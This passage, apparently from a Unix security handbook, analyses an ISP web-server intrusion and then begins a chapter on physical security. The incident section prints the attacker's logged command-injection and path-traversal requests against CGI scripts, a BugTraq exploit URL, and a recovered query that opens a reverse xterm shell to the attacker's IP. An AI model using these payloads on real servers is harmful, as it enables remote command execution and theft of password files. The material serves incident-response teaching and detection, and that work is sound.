To trace the intruder, the ISP tried using the netstat command. Doing so yielded new information. The intruder had not logged in with telnet or SSH; instead, there was an X11 connection from the web server (Apache.Vineyard.NET) to an X server running on the attacker's computer.

    bash-2.02# netstat -a
    Active Internet connections (including servers)
    Proto Recv-Q Send-Q Local Address           Foreign Address         (state)
    tcp        0      0 VINEYARD.NET.http       nhv-ct4-09.ix.ne.1137   SYN_RCVD
    tcp        0      0 VINEYARD.NET.http       nhv-ct4-09.ix.ne.1136   SYN_RCVD
    tcp        0      0 VINEYARD.NET.http       nhv-ct4-09.ix.ne.1135   SYN_RCVD
    tcp        0      0 VINEYARD.NET.http       DSY27.VINEYARD.N.1079   SYN_RCVD
    tcp        0   2456 VINEYARD.NET.http       nhv-ct4-09.ix.ne.1134   ESTABLISHED
    tcp        0   2268 VINEYARD.NET.http       DSY27.VINEYARD.N.1078   ESTABLISHED
    tcp        0   2522 VINEYARD.NET.http       209.174.140.26.1205     ESTABLISHED
    tcp        0   8192 VINEYARD.NET.http       host-209-214-118.1785   ESTABLISHED
    tcp        0   4916 VINEYARD.NET.http       host-209-214-118.1784   ESTABLISHED
    tcp        0      0 VINEYARD.NET.http       host-209-214-118.1783   ESTABLISHED
    tcp        0      0 VINEYARD.NET.http       ASY14.VINEYARD.N.1163   FIN_WAIT_2
    tcp        0      0 LOCALHOST.VINEYA.sendm  LOCALHOST.VINEYA.1135   ESTABLISHED
    tcp        0      0 LOCALHOST.VINEYA.1135   LOCALHOST.VINEYA.sendm  ESTABLISHED
    tcp        0      0 VINEYARD.NET.smtp       208.135.218.34.1479     ESTABLISHED
    tcp        0   3157 VINEYARD.NET.pop        ASY5.VINEYARD.NE.1027   ESTABLISHED
    tcp        0      0 APACHE.VINEYARD..ssh    MAC-EWB.VINEYARD.2050   ESTABLISHED
    tcp        0      0 VINEYARD.NET.http       host-209-214-118.1782   FIN_WAIT_2
    tcp        0      0 VINEYARD.NET.http       host-209-214-118.1781   FIN_WAIT_2
    tcp        0      0 VINEYARD.NET.http       host-209-214-118.1775   FIN_WAIT_2
    tcp        0      0 VINEYARD.NET.http       56k-2234.hey.net.1099   FIN_WAIT_2
    tcp        0      0 VINEYARD.NET.https      ESY8.VINEYARD.NE.1557   FIN_WAIT_2
    tcp        0      0 LOCALHOST.VINEYA.sendm  LOCALHOST.VINEYA.1058   ESTABLISHED
    tcp        0      0 LOCALHOST.VINEYA.1058   LOCALHOST.VINEYA.sendm  ESTABLISHED
    tcp        0      0 APACHE.VINEYARD..smtp   m28.boston.juno..54519  ESTABLISHED
    tcp        0      0 APACHE.VINEYARD..ssh    MAC-EWB.VINEYARD.nfs    ESTABLISHED
    tcp        0    328 APACHE.VINEYARD..ssh    MAC-EWB.VINEYARD.2048   ESTABLISHED
    tcp        0      0 VINEYARD.NET.http       ASY14.VINEYARD.N.1162   FIN_WAIT_2
    tcp        0      0 VINEYARD.NET.http       ASY14.VINEYARD.N.1160   FIN_WAIT_2
    tcp        0      0 NEXT.VINEYARD.NE.ssh    ASY12.VINEYARD.N.1047   ESTABLISHED
    tcp        0   7300 VINEYARD.NET.pop        DSY27.VINEYARD.N.1061   ESTABLISHED
    tcp        0      0 NEXT.VINEYARD.NE.imap2  ASY12.VINEYARD.N.1041   ESTABLISHED
    tcp        0      0 VINEYARD.NET.3290       VINEYARD.NET.imap2      CLOSE_WAIT
    tcp        0      0 VINEYARD.NET.ssh        simsong.ne.media.1017   ESTABLISHED
    tcp        0      0 APACHE.VINEYARD..3098   KRLDB110-06.spli.X11    ESTABLISHED
    tcp     8760      0 VINEYARD.NET.1022       BACKUP.VINEYARD..ssh    ESTABLISHED
    tcp        0      0 LOCALHOST.VINEYA.4778   *.*                     LISTEN
    tcp        0      0 LOCALHOST.VINEYA.domai  *.*                     LISTEN
    tcp        0      0 NET10.VINEYARD.N.domai  *.*                     LISTEN
    tcp        0      0 SMTP4.VINEYARD.N.domai  *.*                     LISTEN

The ISP concluded that the attacker had used a vulnerability in a CGI script to spawn an xterm back to his own remote machine. To test this hypothesis, a quick search was made through the ISP's web server logs:

    % grep -I krldb110-06 /vni/apache/log/access_log
    1. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    2. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    3. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/viewsource?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    4. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:53 -0400] "GET /cgi-bin/htmlscript?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    5. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:54 -0400] "GET /cgi-bin/campas?%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    6. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:55 -0400] "GET /cgi-bin/handler/useless_shit;ls%20lFa|?data=Download HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    7. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:56 -0400] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    8. krldb110-06.splitrock.net - - [06/Oct/1998:02:54:30 -0400] "GET /cgi-bin/faxsurvey?ls%20lFa HTTP/1.1" 200 5516 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    9. krldb110-06.splitrock.net - - [06/Oct/1998:02:54:44 -0400] "GET /cgi-bin/faxsurvey?uname%20-a HTTP/1.1" 200 461 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    10. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:03 -0400] "GET /cgi-bin/faxsurvey?id HTTP/1.1" 200 381 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    11. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1" 200 79467 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    12. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:44 -0400] "GET /cgi-bin/faxsurvey?ls%20lFa%20/usr/ HTTP/1.1" 200 1701 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    13. krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] "GET /cgi-bin/faxsurvey?id HTTP/1.1" 200 381 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
    14. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:01 -0400] "GET /cgi-bin/faxsurvey?pwd HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
    15. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] "GET /cgi-bin/faxsurvey?/bin/pwd HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
    16. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:33 -0400] "GET /cgi-bin/faxsurvey?ls%20lFa HTTP/1.1" 200 5516 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
    17. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] "GET /cgi-bin/faxsurvey?ls%20lFa%20../conf/ HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"

Note that lines 1 through 7 occurred within a few seconds of one another. The attacker appears to have used an automated tool that looks for CGI vulnerabilities. In lines 8 through 17, the attacker exploits a vulnerability in the faxsurvey script. This was almost certainly done with a different tool. One reason is that the version of the HTTP protocol supported by the client changed from "HTTP/1.0" to "HTTP/1.1".

The web server log revealed that the full hostname of the attacker was krldb110-06.splitrock.net. Using the host command, this name can be translated into an actual IP address:

    apache: {43} % host krldb110-06.splitrock.net
    krldb110-06.splitrock.net has address 209.156.113.121
    apache: {44} %

Examining this log, it appears that the /cgi-bin/faxsurvey script has a flaw that allows an attacker to execute arbitrary commands (otherwise, why else would the attacker keep calling this script and sending URLs with different arguments?).

If this was true, then the following commands must have been executed by the attacker:

    ls -lFa
    ls -lFa
    uname -a
    id
    cat /etc/passwd
    ls -lFa /usr/
    id
    pwd
    /bin/pwd
    ls -lFa
    ls -lFa ../conf/

It is not clear from the log files how the attacker got from running these commands to running the xterm command, but it is quite clear that xterm was run: the http line in the output of the w command, the running xterm process, and the X11 line in the netstat output are all evidence of it.
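The triage the ISP carried out by eye on the access log above can be scripted. The following Python code is an added example, not part of the handbook: it URL-decodes each CGI request, flags traversal and shell-style payloads, detects the burst of probes against many different scripts, and lists the requests that returned 200 with a command-like query. The command word list, the thresholds and all function names are assumptions chosen for illustration; the sample lines are taken from the log above with the trailing fields dropped.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Entries 1-3, 5, 7-9, 11 and 15 of the access log above, with the trailing
# referrer/agent/docroot fields dropped and the wrapped URLs re-joined.
SAMPLE_LOG = """\
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 -
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20lFa HTTP/1.0" 200 5469
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/viewsource?../../../../../../../../etc/passwd HTTP/1.0" 404 -
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:54 -0400] "GET /cgi-bin/campas?%0als%20-lFa HTTP/1.0" 404 -
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:56 -0400] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 404 -
krldb110-06.splitrock.net - - [06/Oct/1998:02:54:30 -0400] "GET /cgi-bin/faxsurvey?ls%20lFa HTTP/1.1" 200 5516
krldb110-06.splitrock.net - - [06/Oct/1998:02:54:44 -0400] "GET /cgi-bin/faxsurvey?uname%20-a HTTP/1.1" 200 461
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1" 200 79467
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] "GET /cgi-bin/faxsurvey?/bin/pwd HTTP/1.1" 200 305
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Assumption: a decoded query whose first word is one of these is a shell command.
COMMAND_WORDS = {"ls", "cat", "id", "uname", "pwd", "which", "xterm", "sh"}


def parse_line(line):
    """Return the fields of one access-log entry, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    return {
        "host": m["host"],
        "time": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "script": path,
        "query": unquote(query),          # %20 -> space, %0a -> newline
        "proto": m["proto"],
        "status": int(m["status"]),
    }


def query_flags(query):
    """Label a decoded query string with the suspicious traits it shows."""
    flags = set()
    if "../" in query:
        flags.add("path-traversal")
    if "/etc/passwd" in query:
        flags.add("sensitive-path")
    if any(c in query for c in "\n;|`"):
        flags.add("shell-metachar")
    words = query.split()
    if words and words[0].rsplit("/", 1)[-1] in COMMAND_WORDS:
        flags.add("command-like")
    return flags


def triage(log_text, burst_seconds=10, burst_scripts=4):
    """Per client host: was there a multi-script probe burst, and which
    command-like CGI requests were answered with status 200?"""
    by_host = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["script"].startswith("/cgi-bin/"):
            rec["flags"] = query_flags(rec["query"])
            by_host[rec["host"]].append(rec)

    report = {}
    for host, recs in by_host.items():
        recs.sort(key=lambda r: r["time"])
        scan = False
        for i, first in enumerate(recs):
            window = {r["script"] for r in recs[i:]
                      if (r["time"] - first["time"]).total_seconds() <= burst_seconds}
            if len(window) >= burst_scripts:   # many different scripts, seconds apart
                scan = True
                break
        report[host] = {
            "scan_burst": scan,
            "executed": [(r["script"], r["query"]) for r in recs
                         if r["status"] == 200 and "command-like" in r["flags"]],
            "protocols": sorted({r["proto"] for r in recs}),
        }
    return report


if __name__ == "__main__":
    for host, info in triage(SAMPLE_LOG).items():
        print(host, info)
```

A 200 response to a command-like query against a single script, after a burst of 404s across many scripts, is the pattern that separates the scan in lines 1 to 7 from the hands-on use of faxsurvey in lines 8 to 17.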
At this point, the ISP searched its other log files for the attacker's hostname. One suspicious result turned up in the messages log file; apparently the attacker had tried to exploit a flaw in POP or qpopper:

    apache: {15} % grep -i krldb110-06 *
    messages:Oct 6 03:38:29 apache popper.bsdos[22312]: @KRLDB110-06.splitrock.net: -ERR POP timeout

To preserve a record of the attacker's processes, they were stopped, an image of the process memory was saved, and the processes were then killed.

Following this, a rule was added to the ISP's routers to block access from the attacker's IP addresses. The permissions on the faxsurvey script were changed to prevent any access, so that everything would be ready for the start of an investigation. A few days later the script was removed from the web server.

The victim ISP contacted SplitRock Services, the ISP that was responsible for the attacker's IP address. It turned out that SplitRock operated several modem pools that it provided to another ISP under a lease agreement. SplitRock was asked to preserve its log files so that they could be used in future investigations.
Using the strings command, it was possible to learn much more about the attacker. One group of strings belonged to the shell history, a list of the commands the attacker had typed. It appeared that the attacker had downloaded a rootkit and had also tried to mount a buffer overflow attack against the system's IMAP server:

    -lFa gcc -o s s.c st2.c ftp 209.156.113.121 cron.c gcc -o s st2.c
    cxterm.c ./s console x2.c t.s qpush.c .121 cat t.c qpush.c cat.c ppp.c
    cat s.c t2.c gc c cron.c ls -lFa cxterm.c ./s -v c2 tcsh ./s p0 x2.c
    ls -lFa / README cat.s README.debian ls -lFa qpush cat /w qpush.c
    ls -lFa / qpush.c.old cat.s Gf: not found _=.s /tmp $ : not found mfs:28
    gcc -o s steal.c /bin/sh ls -lFa *.c /bin/sh /bin/sh /etc/inetd.conf
    qpush.c /usr/bin/gcc n/gcc ./cc Expr Done /bin/sh inetd.conf
    t) | telnet 127.1 143 cd /etc cat.s
    which pwd ls -lFa expr $L + 1 ls -lFa ./cc -10 ./cc

A second kind of string found in the memory images corresponded to shell environment variables. Many of them were variables that would be set for a process spawned by a CGI script, which confirmed that the shell had been started as the result of a CGI attack. This section (below) confirmed that the CGI script responsible for the intrusion was the faxsurvey script:

    GATEWAY_INTERFACE=CGI/1.1
    REMOTE_HOST=krldb110-06.splitrock.net
    MACHTYPE=i386-pc-bsdi3.1
    HOSTNAME=apache.vineyard.net
    L=100
    SHLVL=1
    REMOTE_ADDR=209.156.113.121
    QUERY_STRING=/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh
    DOCUMENT_ROOT=/htdocs/biz/captiva
    REMOTE_PORT=4801
    HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)
    HTTP_ACCEPT=application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
    SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
    HTTP_HOST=www.captivacruises.com
    LOGNAME=http
    WINDOWID=8388621
    _=/bins
    REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh
    SERVER_SOFTWARE=Stronghold/2.2 Apache/1.2.5 C2NetUS/2002
    TERM=xterm
    HTTP_CONNECTION=Keep-Alive
    PATH=/usr/local/bin:/bin:/usr/bin:/usr/sbin
    HTTP_ACCEPT_LANGUAGE=en-us
    DISPLAY=209.156.113.121:0.0
    SERVER_PROTOCOL=HTTP/1.1
    HTTP_ACCEPT_ENCODING=gzip, deflate
    SHELL=/bin/tcsh
    REQUEST_METHOD=GET
    OSTYPE=bsdi3.1
    SERVER_ADMIN=mvol@vineyard.net
    SERVER_ROOT=/usr/local/apache
    TERMCAP=xterm|vi|xterm-ic|xterm-vi|xterm with insert character instead of insert mode:
        :al@:dl@:im=:ei=:mi@:ic=\E[@:
        :AL=\E[%dL:DC=\E[%dP:DL=\E[%dM:DO=\E[%dB:IC=\E[%d@:UP=\E[%dA:
        :al=\E[L:am:
        :bs:cd=\E[J:ce=\E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:co#80:
        :cs=\E[%i%d;%dr:ct=\E[3k:
        :dc
    SERVER_PORT=80
    SCRIPT_NAME=/cgi-bin/faxsurvey
    HOSTTYPE=i386

After the break-in, the victim ISP contacted the Boston office of the Federal Bureau of Investigation. The ISP was informed that the Boston office required damages in excess of an $8,000 threshold before it would open an investigation. Because the damage had not reached this minimum, no investigation was opened. Although the reason for such minimums is understandable, it would be better if they did not exist, for two main reasons:

• Many attacks are carried out by relatively young attackers who might stop such activity after receiving a warning or, at most, a suspended sentence. The lack of any official investigation and follow-up only encourages these attackers to move on to bigger and bigger crimes, until they are responsible for serious damage.
• The attacker may be quite sophisticated and involved in other illegal activity that usually goes unnoticed. There are many cases in which investigations of small crimes have led law enforcement agencies to major economic crimes. For example, a 75-cent accounting discrepancy led Cliff Stoll to track down a computer intruder who ultimately turned out to be breaking into U.S. commercial and military computers on the orders of the Soviet Union. (The story is told in detail in Stoll's classic hacker thriller, The Cuckoo's Egg.)
Once the matter had been cleared up, it turned out that the vulnerability in the faxsurvey script had been reported on the BugTraq mailing list about three months before the attack. Either nobody on the ISP's staff had been reading the BugTraq mailing list, or nobody knew that the faxsurvey script was installed on the system:

    Date: Tue, 4 Aug 1998 07:41:24 -0700
    Reply-To: dod@muenster.net
    From: Tom <dod@MUENSTER.NET>
    Subject: remote exploit in faxsurvey cgi-script

    Hi!

    There exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any command s/he wants with the permissions of the HTTP-Server.

    All the attacker has to do is type http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd in his favorite Web-Browser to get a copy of your Password-File.

    All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with the HylaFAX package installed are vulnerable to this attack.

    AFAIK the problem exists in the call of 'eval'.

    I notified the S.u.S.E. team (suse.de) about that problem. Burchard Steinbild <bs@suse.de> told me, that they have not enough time to fix that bug for their 5.3 Dist., so they decided to just remove the script from the file list.

After the attack, the ISP carried out the following cleanup:

• An immediate backup of all disks was made. This backup was kept as evidence in case damage was discovered that needed to be followed up.
• The system was scanned for files with new permissions. None were found.
• Permissions on the /usr/include directory and the C compiler were changed so that only staff members could access these files and compile new programs.
• Key programs were compared with the original distribution on CD-ROM to detect any modifications. They had not been modified.
• All log files were examined manually for additional suspicious activity. None was found.
• After a week, the router rule that blocked access from SplitRock was removed.
Chapter 3: Physical Security

Overview

"Physical security" is everything that happens before you type commands on the keyboard: building the alarm system, the key lock on the computer's power supply, the locked computer room with closed-circuit camera monitoring, and the power distribution units and uninterruptible power supply (UPS). Although physical security is a very important matter, it is often overlooked. This chapter discusses many threats to physical security, including environmental hazards, vandalism, and theft, and offers suggestions for dealing with them.

Elements of Physical Security

People first

It should go without saying that in an emergency or disaster, the lives and safety of personnel must always take precedence over data or equipment. Although there may be very limited exceptions to this principle (for example, in sensitive military situations), you should never lose sight of what is truly irreplaceable.

Planning for the forgotten threats

Surprisingly, many organizations pay no attention to physical security. One New York investment house that was repeatedly being burglarized spent tens of thousands of dollars on computer security testing to prevent unauthorized entry during the day, only to conclude after some time that the problem was that the cleaner left the doors to the computer room open at night while cleaning it. A magazine in San Francisco had more than $100,000 worth of computers stolen over a holiday, because an employee had used his electronic key card to open the building door and disable the alarm system. After entering the building, this person went to the utility room, where the alarm system was located, and also pulled the paper log out of the alarm system's printer and destroyed it.

Other organizations believe that dealing with physical security properly is too complicated or too difficult. Few organizations are able to protect their servers from nuclear attack, major earthquakes, or terrorist bombings; but the fact that such catastrophes cannot be countered should never become an excuse that keeps an organization from planning carefully for lesser misfortunes.

The issues that physical security covers (the threats, practices, and protections) differ for practically every site and organization. Because every site is different, this chapter cannot offer a set of specific recommendations; it can only provide a starting point, a list of issues to consider, and a suggested procedure for formulating your actual plan.

The physical security plan

The first step in physically securing your installation is to formulate a written plan that addresses your current physical security needs and your intended future direction. Ideally, the physical plan should be part of your written security policy. To be complete, the plan should be read by other members of the organization, and it should also be approved by senior management. Thus the purpose of the plan is both planning and political.
Your security plan should describe the assets you are protecting, their value, where they are located, the likely threats they face, and the probability of those threats. Do not forget to include information as one of your assets. You should also identify your security perimeter (the boundary between the rest of the world and your secured area) and any holes in the perimeter, along with your defenses, your plans for strengthening them, and the cost of implementing those plans.

If you manage a particularly critical installation, take great care in drawing up this plan and, for example, have it reviewed by an outside firm that specializes in disaster recovery planning and risk assessment. Treat your security plan as a sensitive document: by its very nature, it contains detailed information about your weakest defenses.

The disaster recovery plan

You should also have a plan for the immediate, temporary protection of computer equipment and for loading your backups onto new systems if your computers are stolen or damaged. This plan is known as a disaster recovery plan. The plan should include its own security component as well: even while you are working at a disaster-stricken site or recovering a system after a disaster, security principles should ideally still be observed.

You can test parts of this plan regularly by renting or borrowing a computer system and trying to restore your backups. Less frequently, you can run through the entire plan as a test to make sure that the alternate facilities are available and work properly when you need them.
Other contingencies

In addition to the items already mentioned, you may want to consider the effect of the following on your operations:

Loss of telephone service or network connections: How would the loss of these services and connections affect your normal operations?

Vendor continuity: How important is support? If the vendor goes into a different line of business or makes changes that you do not want to adopt, can you move to another hardware or software system?

Significant staff absenteeism: Would this affect your ability to operate?

Death, incapacitation, or dismissal of a key member of the organization: Can every member of your computer organization be replaced? What are the contingency plans?

Your disaster recovery planning should be consistent with your organization-wide contingency plans. Preserving information is usually vital, but it is of less use when the space, power, or tools needed to keep operating are not available.

Protecting computer hardware

Physically protecting a computer presents many of the same problems that arise when protecting typewriters, jewelry, or file cabinets full of records. As with a typewriter, an office computer is something that many people in the office need to be able to use. Like jewelry, computers are valuable and generally easy for a thief to sell. Like legal files and financial records, if you do not have a backup (or if the backup is stolen or destroyed along with the computer), the information you have lost may be irreplaceable. Even if you do have a backup, you will still need to spend considerable time setting up a replacement system. Finally, there is always the chance that the stolen information, or even the mere fact that your information was stolen, will be used against you.

Making matters worse, computers and computer media are very sensitive to their environment. A computer's power supply can easily be burned out if it is plugged in when lightning strikes nearby.
There are various measures you can take to protect computer systems against physical threats. Many of these solutions simultaneously protect the system from natural disasters, outsiders, and inside saboteurs.

Protecting against environmental threats

Computers usually need a well-balanced physical environment to operate properly. Upsetting this balance can cause a computer to fail in unexpected and usually unpleasant ways. Even worse, the computer may keep running erratically, producing incorrect results and corrupting valuable data.

Fire

Computers usually survive fire very poorly. If you want your computer to be an exception, make sure that good fire-extinguishing equipment is available nearby and that staff are trained to use it properly. Automatic gas discharge systems and water sprinkler systems each have advantages and disadvantages that must be weighed carefully.

Make sure that the wiring is protected as well as the computers. Make sure that smoke detectors and sprinkler heads, if used, are positioned so that they also cover the wires in cable trays (often above suspended ceilings) and the cable ducts.

Smoke

Smoke is very damaging to computer equipment. Smoke is a potent abrasive and collects on the heads of unsealed magnetic disks, optical disks, and tape drives. Sometimes the smoke is produced by the computer itself. Electrical fires, particularly those caused by the transformers in video monitors, can produce pungent, acrid smoke that may damage other equipment and may also be poisonous or carcinogenic. Another significant danger is the smoke from cigarettes and pipes.

Install smoke detectors in every room that contains computer equipment, and make sure they are also present under raised floors and above suspended ceilings. Do not allow anyone to smoke in your computer room.
Earthquake

Nearly every part of the earth experiences occasional tremors. Some buildings collapse in an earthquake, but many remain standing. Careful attention to the placement of shelves and bookcases in your office can increase the chances that you and your computers survive even the most severe events.

Avoid placing computers on high surfaces or near windows, and avoid placing heavy objects on shelves near computers. Computers can be placed under sturdy tables or attached to the surface they sit on, using bolts, tie-down straps, or other means. (Doing so also helps deter theft.)

Temperature extremes

Computers, like people, work well within a certain temperature range. Most computer systems should be kept between 10 and 32 degrees Celsius (50 to 90 degrees Fahrenheit). If the ambient temperature around your computer gets too high, the computer cannot cool itself adequately and its internal components may be damaged. If the temperature gets too low, the system may suffer thermal shock when it is turned on, cracking its circuit boards or integrated circuits.

Once you have determined the temperature range within which your computers can operate, make sure those temperatures are maintained. Pay particular attention to heat sinks and to the airflow patterns of your equipment. Use temperature alarms to monitor the ambient temperature.

Electrical noise

Motors, fans, heavy equipment, and even other computers generate electrical noise that can cause intermittent problems for the computer you are using. This noise can be transmitted through the air or over nearby power lines.

Electrical surges are a particular kind of electrical noise consisting of one or more high-voltage pulses. Where possible, each computer should have its own separate electrical circuit and ground wire with an isolated power filter. Under no circumstances should a computer share a circuit with heavy electrical equipment. Radio transmitters (including mobile phones) should be kept away from computers.

Lightning

Lightning generates large power surges that can damage even computers that have electrical protection. If lightning strikes your building's metal frame (or its lightning rod), the resulting current can generate a strong magnetic field on its way to ground. Computers should be unplugged during lightning storms; if that is not possible, use surge suppressors. Although these devices will not protect equipment against a direct strike, they help when the storms are distant. Magnetic media should be kept as far as possible from the building's metal structure. Never run copper network cable outdoors unless it is in metal conduit.

Water

Water can destroy your computer. The primary danger is an electrical short circuit, which occurs when water bridges a voltage-carrying line and a ground line on a circuit board.

Water usually comes from rain or flooding, and sometimes from a sprinkler system that goes out of control. Water may also come from unexpected places, such as an overflowing sink on a higher floor, vandalism, or the fire department.

Keep computers out of basements that are prone to flooding. Install water sensors on the floor of computer rooms and under raised floors, and use them to cut off power automatically if flooding occurs.

Food and drink

Food, especially greasy food, sticks to people's fingers and from there is transferred to anything they touch. Often this includes dirt-sensitive surfaces such as magnetic tapes and optical disks. One of the fastest ways to put a desktop keyboard out of commission is to spill a soft drink or a cup of coffee on its keys. In general, the simplest rule is also the safest: keep all food and drink away from your computer systems. [56]
[56] This rule is perhaps more important than any other rule in this chapter, and it is also frequently broken.

Other environmental hazards

Other environmental hazards may also arise:

• Dust: Keep your computer rooms as free of dust as possible, and clean them at regular intervals using a vacuum cleaner made for computers with a very fine filter.
• Explosion: If you must operate a computer in an area where there is a risk of explosion, use blast-proof enclosures. Backups should also be kept in blast-proof enclosures or off-site.
• Insects: Take effective measures to limit the number of insects in your computer room.
• Vibration: In a high-vibration environment, place computers on a rubber or soft mat, making sure that the ventilation openings are not blocked.
• Humidity: Monitor the ambient humidity and keep it at an appropriate level.

Environmental monitoring

To detect unexpected problems, continuously monitor and record the temperature and relative humidity of your computer room. As a general rule, every 1,000 square feet of office space should have its own recording equipment. Review and report on the recordings at regular intervals.

Physical access control

Common sense tells you to keep your computer in a locked room; but how secure is that room? Sometimes a room that appears secure is in fact completely insecure.

Raised floors and dropped ceilings

In many modern office buildings, interior walls do not extend above the ceiling or below the floor. This kind of construction makes access from adjacent rooms and offices easy.

Entrance through air ducts

If the air ducts that serve your computer room are large enough, intruders can use them to get into an otherwise secure area. Areas that need large amounts of ventilation should be served by several small ducts, or by a large duct with screens welded over the vents or inside the duct. In a very high-security environment, motion detectors can also be used inside the ducts.
Glass walls

Although glass walls and large windows are usually used for architectural effect, they can be serious security risks. Glass walls are easily broken; a brick or a bottle of gasoline thrown at a window can cause considerable damage. An attacker can also obtain vital information, such as passwords or details of how the system operates, simply by watching the people on the other side of a glass wall or window. It may even be possible to recover information from behind a frosted pane by analyzing the light reflected from it. Interior glass walls are good for rooms that must be guarded but that the guard is not allowed to enter; in all other cases, avoid them.

Protecting against vandalism

Computer systems are good targets for vandalism. Motives for vandalism can include revenge, riots, strikes, political or ideological statements, or simply entertainment for the foolish. In principle, any part of a computer system, or of the building that houses it, may be a target for vandalism. In practice, some targets are more vulnerable than others.

Ventilation holes

Years ago, 60 workstations at the Massachusetts Institute of Technology (MIT) were destroyed in a single afternoon by a student who poured his soft drink into the ventilation holes of each computer.

Computers that have ventilation holes need them. You cannot block the holes to prevent this kind of vandalism; instead, strictly prohibit bringing food and drink into the computer room, or provide 24-hour surveillance by a guard or closed-circuit television.

Network cables

In many cases a vandal can disable an entire subnet of workstations by cutting a single wire with a pair of wire cutters. Compared with Ethernet, fiber-optic cables are more vulnerable (they are more easily damaged), harder to repair (they are difficult to splice), and more attractive targets (they usually carry more information).
"Temporary" cabling in an installation usually ends up being used permanently, so spend the extra time and effort to install the cable properly in the first place. One simple way to protect a network cable is to route it through physically secure locations. For example, Ethernet can be run through steel conduit. Besides protecting against vandalism, this approach also helps protect against some kinds of network eavesdropping, and it may help your cables survive a small fire. If someone steps on a fiber-optic cable, it may develop small fractures. A fracture of this kind is hard to find, because it leaves no trace on the cable's jacket.

